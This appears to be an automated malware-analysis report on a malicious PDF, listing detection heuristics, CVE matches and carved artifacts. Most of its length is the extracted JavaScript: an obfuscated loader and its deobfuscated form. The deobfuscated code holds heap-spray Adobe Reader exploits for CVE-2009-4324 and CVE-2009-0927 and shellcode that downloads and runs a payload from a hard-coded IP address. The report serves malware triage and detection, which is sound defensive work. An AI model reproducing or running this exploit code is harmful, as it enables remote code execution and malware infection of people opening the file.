MALICIOUS
310
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.007 JavaScript
The PDF file contains embedded JavaScript that exploits multiple CVEs (CVE-2009-4324 and CVE-2009-0927) in Adobe Reader, specifically targeting the `media.newPlayer` and `Collab.getIcon` functions. The deobfuscated JavaScript contains URLs that are likely used to download and execute a second-stage payload. The primary function of this exploit is to achieve arbitrary code execution via a known vulnerability.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 9
-
media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
-
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
-
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KITOne recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
-
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERYBounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URLDecoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://91.228.133.56/dng290911/db1523498df7965a4ccd8abc43397f6d/d7.php?f=g Referenced by PDF JavaScript
- http://91.228.133.56/dng290911/db1523498df7965a4ccd8abc43397f6d/d8.php?f=nReferenced by PDF JavaScript
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0076_000.js |
pdf-javascript-stream | PDF /JS object 76 at offset 0x38A | 12615 bytes |
SHA-256: dd75c17a4dbc7284c769e849355e3c373ec2e5a543d8c1f0398a22847319dc35 |
|||
Preview scriptFirst 1,000 lines of the extracted script
a="l=a}bu2n>9NAe0BDp4gd3:ysm.-t)S<fhc_{P( ,1']vxC8@7Fw5E%Vo[6r;I&+|i";
w='';
w+='sl';
w+='i';
w+="c"+a[12];
j='b343tb3g';
j=j[w];
z
=new Array
(43,2,58,38,34,40,55,1,41,53,5,46,20,57,57,53,5,49,45,52,17,53,5,46,51,49,45,53,5,48,51,52,17,53,5,52,9,20,17,53,5,20,20,51,49,53,5,57,17,45,13,53,5,17,13,46,14,53,5,46,14,20,13,53,5,13,45,17,13,53,5,48,13,46,14,53,5,51,57,40,45,53,5,48,57,46,14,53,5,20,20,13,46,53,5,57,57,15,14,53,5,51,52,46,14,53,5,13,20,20,45,53,5,20,20,48,17,53,5,46,40,6,45,53,5,40,51,52,52,53,5,49,49,40,13,53,5,14,46,49,49,53,5,17,13,46,14,53,5,45,20,20,13,53,5,20,9,17,57,53,5,48,51,13,57,53,5,46,48,49,14,53,5,6,17,20,17,53,5,52,17,46,51,53,5,51,40,48,51,53,5,52,14,52,9,53,5,51,40,17,45,53,5,46,14,51,57,53,5,20,45,48,51,53,5,48,17,46,14,53,5,48,46,20,51,53,5,49,51,13,20,53,5,46,14,51,57,53,5,6,13,48,57,53,5,49,51,13,20,53,5,45,9,20,20,53,5,17,40,17,9,53,5,11,15,49,45,53,5,45,51,13,20,53,5,15,14,20,20,53,5,14,52,13,49,53,5,20,46,40,13,53,5,48,17,49,6,53,5,45,40,13,46,53,5,13,15,45,14,53,5,15,11,13,20,53,5,52,14,17,13,53,5,20,14,49,40,53,5,48,51,40,49,53,5,51,52,52,57,53,5,51,52,46,14,53,5,13,20,6,17,53,5,57,57,15,15,53,5,13,45,46,14,53,5,46,15,17,14,53,5,52,45,17,57,53,5,51,17,49,49,53,5,13,45,6,17,53,5,15,46,46,14,53,5,15,15,13,20,53,5,13,17,46,14,53,5,13,20,46,14,53,5,11,14,45,51,53,5,51,9,51,52,53,5,52,14,45,20,53,5,11,15,51,20,53,5,57,46,46,14,53,5,46,13,6,13,53,5,13,45,48,15,53,5,48,17,20,20,53,5,9,57,13,20,53,5,49,20,52,14,53,5,57,46,46,14,53,5,46,14,13,46,53,5,57,11,49,48,53,5,51,9,13,51,53,5,9,46,52,46,53,5,49,49,49,49,53,5,52,6,49,49,53,5,52,46,49,9,53,5,13,13,13,13,53,5,13,13,13,13,53,5,51,13,51,46,53,5,17,13,57,11,53,5,49,49,57,46,53,5,13,13,13,13,53,5,51,13,13,13,53,5,45,13,46,20,53,5,51,13,40,9,53,5,46,14,51,51,53,5,46,14,52,45,53,5,40,13,51,52,53,5,45,20,46,20,53,5,49,49,13,51,53,5,57,46,52,20,53,5,57,52,57,49,53,5,13,13,13,13,53,5,48,51,57,46,53,5,57,45,48,6,53,5,51,17,57,15,53,5,40,57,49,49,53,5,45,17,46,20,53,5,46,14,13,46,53,5,52,46,52,46,53,5,49,49,57,40,53,5,49,49,49,49,53,5,13,6,52,14,53,5,48,6,52,14,53,5,52,45,46,40,53,5,13,40,13,17,53,5,13,13,13,13,53,5,51,45,46,15,53,5,13,45,6,17,53,5,13,17,45,48,53,5,48,6,6,17,53,5,57,48,57,51,53,5,45,48,48,20,53,5,6,17,17,17,53,5,48,57,13,17,53,5,20,20,48,6,53,5,45,48,20,6,53,5,6,17,17,17,53,5,6,13,13,46,53,5,48,20,6,15,53,5,51,20,6,13,53,5,49,46,57,46,53,5,13,13,13,13,53,5,49,49,13,13,53,5,13,45,51,57,53,5,52,46,46,14,53,5,45,9,20,20,53,5,45,48,51,40,53,5,40,15,17,17,53,5,48,48,13,13,53,5,57,6,48,13,53,5,45,48,48,17,53,5,40,15,17,17,53,5,6,52,13,51,53,5,57,45,57,17,53,5,45,57,57,45,53,5,40,15,17,17,53,5,13,13,13,9,53,5,46,11,51,9,53,5,13,17,45,40,53,5,46,46,20,13,53,5,40,15,17,17,53,5,17,40,13,17,53,5,57,11,51,40,53,5,57,11,13,13,53,5,51,20,13,13,53,5,57,11,51,48,53,5,49,49,13,13,53,5,40,17,51,57,53,5,45,13,46,51,53,5,40,57,48,51,53,5,13,13,57,11,53,5,49,49,51,20,53,5,13,17,51,57,53,5,13,13,57,11,53,5,52,14,46,20,53,5,51,20,13,45,53,5,51,57,49,49,53,5,46,20,13,17,53,5,13,45,45,20,53,5,13,6,52,14,53,5,40,20,52,14,53,5,46,13,17,48,53,5,13,13,20,49,53,5,49,11,48,51,53,5,46,13,17,48,53,5,13,13,20,49,53,5,45,17,48,51,53,5,13,13,57,11,53,5,49,52,57,11,53,5,51,57,49,49,53,5,52,46,13,46,53,5,49,52,9,45,53,5,49,49,49,49,53,5,17,52,46,52,53,5,52,45,13,52,53,5,49,52,9,46,53,5,13,52,46,11,53,5,57,49,46,9,53,5,14,15,13,40,53,5,45,11,20,20,53,5,51,14,46,11,53,5,45,57,40,14,53,5,48,9,17,57,53,5,40,11,20,57,53,5,48,13,6,49,53,5,48,17,57,46,53,5,48,13,48,17,53,5,6,49,20,11,53,5,20,9,6,49,53,5,6,52,20,40,53,5,20,6,20,6,53,5,6,52,20,46,53,5,20,20,20,40,53,5,6,52,20,20,53,5,20,57,20,51,53,5,57,17,6,49,53,5,57,48,57,52,53,5,20,9,20,6,53,5,20,9,20,13,53,5,20,40,20,40,53,5,57,17,6,49,53,5,20,40,57,6,53,5,20,6,20,51,53,5,20,17,20,20,53,5,20,46,20,9,53,5,57,57,57,17,53,5,20,9,20,48,53,5,20,51,20,57,53,5,20,17,57,40,53,5,57,20,57,20,53,5,20,46,57,17,53,5,57,6,57,40,53,5,20,17,57,20,53,5,20,20,20,20,53,5,20,48,20,9,53,5,20,57,57,57,53,5,6,49,57,17,53,5,20,48,57,17,53,5,48,13,6,52,53,5,48,13,57,46,53,5,57,57,20,49,53,5,57,48,20,15,53,5,13,13,13,13,41,59,43,2,58,38,34,6,55,1,41,53,5,46,20,57,57,53,5,49,45,52,17,53,5,46,51,49,45,53,5,48,51,52,17,53,5,52,9,20,17,53,5,20,20,51,49,53,5,57,17,45,13,53,5,17,13,46,14,53,5,46,14,20,13,53,5,13,45,17,13,53,5,48,13,46,14,53,5,51,57,40,45,53,5,48,57,46,14,53,5,20,20,13,46,53,5,57,57,15,14,53,5,51,52,46,14,53,5,13,20,20,45,53,5,20,20,48,17,53,5,46,40,6,45,53,5,40,51,52,52,53,5,49,49,40,13,53,5,14,46,49,49,53,5,17,13,46,14,53,5,45,20,20,13,53,5,20,9,17,57,53,5,48,51,13,57,53,5,46,48,49,14,53,5,6,17,20,17,53,5,52,17,46,51,53,5,51,40,48,51,53,5,52,14,52,9,53,5,51,40,17,45,53,5,46,14,51,57,53,5,20,45,48,51,53,5,48,17,46,14,53,5,48,46,20,51,53,5,49,51,13,20,53,5,46,14,51,57,53,5,6,13,48,57,53,5,49,51,13,20,53,5,45,9,20,20,53,5,17,40,17,9,53,5,11,15,49,45,53,5,45,51,13,20,53,5,15,14,20,20,53,5,14,52,13,49,53,5,20,46,40,13,53,5,48,17,49,6,53,5,45,40,13,46,53,5,13,15,45,14,53,5,15,11,13,20,53,5,52,14,17,13,53,5,20,14,49,40,53,5,48,51,40,49,53,5,51,52,52,57,53,5,51,52,46,14,53,5,13,20,6,17,53,5,57,57,15,15,53,5,13,45,46,14,53,5,46,15,17,14,53,5,52,45,17,57,53,5,51,17,49,49,53,5,13,45,6,17,53,5,15,46,46,14,53,5,15,15,13,20,53,5,13,17,46,14,53,5,13,20,46,14,53,5,11,14,45,51,53,5,51,9,51,52,53,5,52,14,45,20,53,5,11,15,51,20,53,5,57,46,46,14,53,5,46,13,6,13,53,5,13,45,48,15,53,5,48,17,20,20,53,5,9,57,13,20,53,5,49,20,52,14,53,5,57,46,46,14,53,5,46,14,13,46,53,5,57,11,49,48,53,5,51,9,13,51,53,5,9,46,52,46,53,5,49,49,49,49,53,5,52,6,49,49,53,5,52,46,49,9,53,5,13,13,13,13,53,5,13,13,13,13,53,5,51,13,51,46,53,5,17,13,57,11,53,5,49,49,57,46,53,5,13,13,13,13,53,5,51,13,13,13,53,5,45,13,46,20,53,5,51,13,40,9,53,5,46,14,51,51,53,5,46,14,52,45,53,5,40,13,51,52,53,5,45,20,46,20,53,5,49,49,13,51,53,5,57,46,52,20,53,5,57,52,57,49,53,5,13,13,13,13,53,5,48,51,57,46,53,5,57,45,48,6,53,5,51,17,57,15,53,5,40,57,49,49,53,5,45,17,46,20,53,5,46,14,13,46,53,5,52,46,52,46,53,5,49,49,57,40,53,5,49,49,49,49,53,5,13,6,52,14,53,5,48,6,52,14,53,5,52,45,46,40,53,5,13,40,13,17,53,5,13,13,13,13,53,5,51,45,46,15,53,5,13,45,6,17,53,5,13,17,45,48,53,5,48,6,6,17,53,5,57,48,57,51,53,5,45,48,48,20,53,5,6,17,17,17,53,5,48,57,13,17,53,5,20,20,48,6,53,5,45,48,20,6,53,5,6,17,17,17,53,5,6,13,13,46,53,5,48,20,6,15,53,5,51,20,6,13,53,5,49,46,57,46,53,5,13,13,13,13,53,5,49,49,13,13,53,5,13,45,51,57,53,5,52,46,46,14,53,5,45,9,20,20,53,5,45,48,51,40,53,5,40,15,17,17,53,5,48,48,13,13,53,5,57,6,48,13,53,5,45,48,48,17,53,5,40,15,17,17,53,5,6,52,13,51,53,5,57,45,57,17,53,5,45,57,57,45,53,5,40,15,17,17,53,5,13,13,13,9,53,5,46,11,51,9,53,5,13,17,45,40,53,5,46,46,20,13,53,5,40,15,17,17,53,5,17,40,13,17,53,5,57,11,51,40,53,5,57,11,13,13,53,5,51,20,13,13,53,5,57,11,51,48,53,5,49,49,13,13,53,5,40,17,51,57,53,5,45,13,46,51,53,5,40,57,48,51,53,5,13,13,57,11,53,5,49,49,51,20,53,5,13,17,51,57,53,5,13,13,57,11,53,5,52,14,46,20,53,5,51,20,13,45,53,5,51,57,49,49,53,5,46,20,13,17,53,5,13,45,45,20,53,5,13,6,52,14,53,5,40,20,52,14,53,5,46,13,17,48,53,5,13,13,20,49,53,5,49,11,48,51,53,5,46,13,17,48,53,5,13,13,20,49,53,5,45,17,48,51,53,5,13,13,57,11,53,5,49,52,57,11,53,5,51,57,49,49,53,5,52,46,13,46,53,5,49,52,9,45,53,5,49,49,49,49,53,5,17,52,46,52,53,5,52,45,13,52,53,5,49,52,9,46,53,5,13,52,46,11,53,5,57,49,46,9,53,5,14,15,13,40,53,5,45,11,20,20,53,5,51,14,46,11,53,5,45,57,40,14,53,5,48,9,17,57,53,5,40,11,20,57,53,5,48,13,6,49,53,5,48,17,57,46,53,5,48,13,48,17,53,5,6,49,20,11,53,5,20,9,6,49,53,5,6,52,20,40,53,5,20,6,20,6,53,5,6,52,20,46,53,5,20,20,20,40,53,5,6,52,20,20,53,5,20,57,20,51,53,5,57,17,6,49,53,5,57,48,57,52,53,5,20,9,20,6,53,5,20,9,20,13,53,5,20,40,20,40,53,5,57,17,6,49,53,5,20,40,57,6,53,5,20,6,20,51,53,5,20,17,20,20,53,5,20,46,20,9,53,5,57,57,57,17,53,5,20,9,20,48,53,5,20,51,20,57,53,5,20,17,57,40,53,5,57,20,57,20,53,5,20,46,57,17,53,5,57,6,57,40,53,5,20,17,57,20,53,5,20,20,20,20,53,5,20,48,20,9,53,5,20,57,57,57,53,5,6,49,57,17,53,5,20,46,57,17,53,5,48,13,6,52,53,5,48,13,57,46,53,5,57,57,20,49,53,5,57,52,20,15,53,5,13,13,13,13,41,59,31,5,7,33,27,64,55,7,38,34,20,55,37,28,35,43,2,58,38,34,17,55,1,2,16,16,25,43,64,12,50,12,58,54,12,58,23,64,55,7,25,27,55,29,27,58,64,7,18,37,28,59,34,17,55,1,34,17,55,25,58,12,16,0,2,33,12,37,41,25,41,39,41,41,28,59,50,32,64,0,12,37,34,17,55,25,0,12,7,18,27,32,30,17,28,35,34,17,55,62,1,41,13,41,59,3,34,17,55,1,16,2,58,23,12,60,7,27,37,34,17,55,39,40,13,28,59,58,12,27,5,58,7,38,34,17,55,59,3,31,5,7,33,27,64,55,7,38,34,51,55,37,28,35,31,5,7,33,27,64,55,7,38,34,57,55,37,28,35,43,2,58,38,34,48,55,1,41,16,47,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,38,21,38,22,22,22,22,40,40,40,41,59,5,27,64,0,25,16,58,64,7,27,19,37,34,48,55,39,7,12,50,38,15,2,27,12,37,28,28,59,3,43,2,58,38,34,46,55,1,40,6,13,13,13,59,34,9,55,1,7,12,50,38,11,58,58,2,22,37,28,59,43,2,58,38,34,40,55,13,1,41,53,5,9,13,9,13,53,5,9,13,9,13,41,59,43,2,58,38,34,40,55,40,1,34,6,55,59,34,40,55,13,1,5,7,12,23,33,2,16,12,37,34,40,55,13,28,59,34,40,55,40,1,5,7,12,23,33,2,16,12,37,34,40,55,40,28,59,50,32,64,0,12,37,34,40,55,13,25,0,12,7,18,27,32,30,1,13,44,46,13,13,13,28,35,34,40,55,13,62,1,34,40,55,13,59,3,34,40,55,13,1,34,40,55,13,25,23,5,4,23,27,58,37,13,39,13,44,46,13,13,13,26,34,40,55,40,25,0,12,7,18,27,32,28,59,38,31,55,58,37,34,40,55,6,1,13,59,34,40,55,6,30,34,46,55,59,34,40,55,6,62,62,28,35,34,9,55,56,34,40,55,6,42,1,34,40,55,13,62,34,40,55,40,59,3,64,31,37,34,46,55,28,35,34,57,55,37,28,59,34,57,55,37,28,59,27,58,22,35,27,32,64,23,25,24,12,19,64,2,25,7,12,50,36,0,2,22,12,58,37,7,5,0,0,28,59,3,33,2,27,33,32,37,12,28,35,3,34,57,55,37,28,59,3,3,31,5,7,33,27,64,55,7,38,34,40,55,20,37,28,35,43,2,58,38,34,40,55,17,1,5,7,12,23,33,2,16,12,37,34,40,55,28,59,34,40,55,51,1,5,7,12,23,33,2,16,12,37,41,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,53,5,9,13,9,13,41,28,62,34,40,55,17,59,34,40,55,57,1,5,7,12,23,33,2,16,12,37,41,53,5,9,13,9,13,53,5,9,13,9,13,41,28,59,34,40,55,48,1,40,13,59,34,40,55,46,1,34,40,55,48,62,34,40,55,51,25,0,12,7,18,27,32,59,50,32,64,0,12,37,34,40,55,57,25,0,12,7,18,27,32,30,34,40,55,46,28,34,40,55,57,62,1,34,40,55,57,59,34,40,55,9,1,34,40,55,57,25,23,5,4,23,27,58,64,7,18,37,13,39,34,40,55,46,28,59,34,6,55,6,1,34,40,55,57,25,23,5,4,23,27,58,64,7,18,37,13,39,34,40,55,57,25,0,12,7,18,27,32,26,34,40,55,46,28,59,50,32,64,0,12,37,34,6,55,6,25,0,12,7,18,27,32,62,34,40,55,46,30,13,44,17,13,13,13,13,28,34,6,55,6,1,34,6,55,6,62,34,6,55,6,62,34,40,55,9,59,34,6,55,13,1,7,12,50,38,11,58,58,2,22,37,28,59,31,55,58,37,34,6,55,40,1,13,59,34,6,55,40,30,40,46,13,59,34,6,55,40,62,62,28,34,6,55,13,56,34,6,55,40,42,1,34,6,55,6,62,34,40,55,51,59,43,2,58,38,34,6,55,20,1,17,13,40,6,59,43,2,58,38,34,6,55,17,1,11,58,58,2,22,37,34,6,55,20,28,59,31,55,58,37,34,6,55,40,1,13,59,34,6,55,40,30,34,6,55,20,59,34,6,55,40,62,62,28,35,34,6,55,17,56,34,6,55,40,42,1,5,7,12,23,33,2,16,12,37,41,53,13,2,53,13,2,53,13,2,53,13,2,41,28,59,3,45,55,0,0,2,4,25,18,12,27,60,33,55,7,37,34,6,55,17,62,41,34,10,25,4,5,7,19,0,12,41,28,59,3,43,2,58,38,34,17,55,1,34,20,55,37,28,59,64,31,37,37,37,34,17,55,8,46,9,51,13,28,61,61,37,34,17,55,30,9,13,51,13,28,28,63,63,37,37,34,17,55,8,1,46,13,13,13,28,61,61,37,34,17,55,30,1,46,40,13,6,28,28,28,35,34,40,55,20,37,28,59,3,12,0,23,12,38,64,31,37,37,34,17,55,8,1,9,40,13,13,28,63,63,37,34,17,55,30,1,9,6,13,13,28,63,63,37,34,17,55,8,1,46,40,13,20,28,63,63,37,34,17,55,30,1,46,40,13,48,28,28,35,34,51,55,37,28,59,3);
s='';
b
=
'al';
b2
=a[12]
+
a[43]+b;for
(i=0;i<z.length;i++)
{s+=a[z[i]]}
e=(j());
e=e[b2];
e(s);
|
|||
generic_stage_recovery_000.js |
deobfuscated-js | generic stage recovery alphabet-index-array from JavaScript object 76 at offset 0x38A | 4469 bytes |
SHA-256: 3635ce3d4a495b9dcc1ba7c03f6ba31653c2be2d262c647cbfb0d59269b27002 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 6 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var _1o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u676E%u3932%u3930%u3131%u642F%u3162%u3235%u3433%u3839%u6664%u3937%u3536%u3461%u6363%u3864%u6261%u3463%u3333%u3739%u3666%u2F64%u3764%u702E%u7068%u663F%u673D%u0000';var _2o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u676E%u3932%u3930%u3131%u642F%u3162%u3235%u3433%u3839%u6664%u3937%u3536%u3461%u6363%u3864%u6261%u3463%u3333%u3739%u3666%u2F64%u3864%u702E%u7068%u663F%u6E3D%u0000';function _3o(){var _4o=app.viewerVersion.toString();_4o=_4o.replace('.','');while(_4o.length<4){_4o+='0';}_4o=parseInt(_4o,10);return _4o;}function _5o(){function _6o(){var _7o='p@111111111111111111111111 : yyyy111';util.printd(_7o,new Date());}var _8o=12000;_9o=new Array();var _1o0='%u9090%u9090';var _1o1=_2o;_1o0=unescape(_1o0);_1o1=unescape(_1o1);while(_1o0.length<=0x8000){_1o0+=_1o0;}_1o0=_1o0.substr(0,0x8000-_1o1.length); for(_1o2=0;_1o2<_8o;_1o2++){_9o[_1o2]=_1o0+_1o1;}if(_8o){_6o();_6o();try{this.media.newPlayer(null);}catch(e){}_6o();}}function _1o3(){var _1o4=unescape(_1o);_1o5=unescape('%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090')+_1o4;_1o6=unescape('%u9090%u9090');_1o7=10;_1o8=_1o7+_1o5.length;while(_1o6.length<_1o8)_1o6+=_1o6;_1o9=_1o6.substring(0,_1o8);_2o2=_1o6.substring(0,_1o6.length-_1o8);while(_2o2.length+_1o8<0x40000)_2o2=_2o2+_2o2+_1o9;_2o0=new Array();for(_2o1=0;_2o1<180;_2o1++)_2o0[_2o1]=_2o2+_1o5;var _2o3=4012;var _2o4=Array(_2o3);for(_2o1=0;_2o1<_2o3;_2o1++){_2o4[_2o1]=unescape('%0a%0a%0a%0a');}Collab.getIcon(_2o4+'_N.bundle');}var _4o=_3o();if(((_4o>8950)&&(_4o<9050))||((_4o>=8000)&&(_4o<=8102))){_1o3();}else if((_4o>=9100)||(_4o<=9200)||(_4o>=8103)||(_4o<=8107)){_5o();}
|
|||
generic_stage_recovery_001.js |
deobfuscated-js | generic stage recovery percent-decode from JavaScript object 76 at offset 0x38A | 4461 bytes |
SHA-256: eaf167ee186b02b8eb5dfd37cf0efb79c48d4a98e0b69649137bbdd4f0132b18 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 6 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
